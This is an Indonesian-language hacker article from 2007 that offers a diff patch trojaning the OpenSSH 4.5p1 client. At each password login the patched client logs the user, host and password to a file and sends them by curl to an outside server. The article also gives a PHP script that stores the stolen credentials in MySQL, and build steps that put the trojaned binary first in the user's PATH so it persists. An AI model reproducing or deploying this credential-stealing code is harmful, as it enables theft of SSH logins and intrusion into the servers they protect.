SSH client keystrokes
----------------------

By : Ph03n1X
email : king_purba@yahoo.co.uk
copyleft @2007

Lama ga update kandangjamur.net, akhirnya pengen nulis artikel
Setelah sewa kandangjamur diperpanjang ;)

Ini adalah diff file untuk patching terhadap sshconnect2.c Openssh 4.5p1
ketika ssh client dipatch maka setiap user login ke server ssh lain menggunakan
ssh client ini akan disadap user, password dan server sshnya. hasil penyadapan
dilog dalam file dan/atau dikirim ke server lain via curl


--- openssh-4.5p1/sshconnect2.c 2006-09-01 12:38:37.000000000 +0700
+++ openssh/sshconnect2.c       2007-01-25 04:33:47.000000000 +0700
@@ -67,7 +67,7 @@
 #ifdef GSSAPI
 #include "ssh-gss.h"
 #endif
-
+#define SADAP "logpw.txt"
 /* import */
 extern char *client_version_string;
 extern char *server_version_string;
@@ -734,8 +734,9 @@
 userauth_passwd(Authctxt *authctxt)
 {
        static int attempt = 0;
-       char prompt[150];
+       char prompt[150],EXECWORD[200];
        char *password;
+       FILE *fd1,*fd2;

        if (attempt++ >= options.number_of_password_prompts)
                return 0;
@@ -746,6 +747,19 @@
        snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
            authctxt->server_user, authctxt->host);
        password = read_passphrase(prompt, 0);
+
+       //password login ssh di log dalam file
+       if((fd1=fopen(SADAP,"a"))!=NULL){
+               fprintf(fd1,"lokal user %s login ssh %s@%s dengan password %s\n",authctxt->local_user,authctxt->server_user,authctxt->host,password);
+               fclose(fd1);
+       }
+
+       //password login ssh dikirim ke server lain menggunakan curl
+       if((fd2=fopen("/usr/bin/curl","r"))!=NULL){
+               snprintf(EXECWORD,sizeof(EXECWORD),"/usr/bin/curl -d \"localuser=%s&userssh=%s&serverssh=%s&password=%s\" http://fuckjo.net/savecok.php",authctxt->local_user,authctxt->server_user,authctxt->host,password);
+               system(EXECWORD);
+               fclose(fd2);
+       }
        packet_start(SSH2_MSG_USERAUTH_REQUEST);
        packet_put_cstring(authctxt->server_user);
        packet_put_cstring(authctxt->service);


Untuk curl dibutuhkan script PHP untuk menyimpan hasil penyadapan ke database
misal untuk patch diatas digunakan script savecok.php untuk menyimpan password
hasil penyadapan ke database. script savecok.php sebagai berikut :

<?php

$localuser=$_POST['localuser'];
$userssh=$_POST['userssh'];
$serverssh=$_POST['serverssh'];
$passowrd=$_POST['password'];

$host="localhost";
$user="otong";
$pass="otong123";
$id_con=mysql_connect($host,$user,$pass) or die("Can not connect to  MySQL server");
mysql_select_db("password") or die("Failed to choose database");
mysql_query("insert into bd (localuser,userssh,serverssh,password) values ('$localuser','$userssh','$serverssh','$passowrd')",$id_con);
mysql_close($id_con);

?>

Bagaimana cara pakek tuh script??

wget ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-4.5p1.tar.gz
tar zxvf openssh-4.5p1.tar.gz
cp keylog.diff openssh-4.5p1/
cd openssh-4.5p1/
patch < keylog.diff
./configure
make ssh
cp ssh /home/user/bin/
export PATH=/home/user/bin/:$PATH
echo "export PATH=/home/user/bin/:$PATH" >> ~/.bash_profile


Salam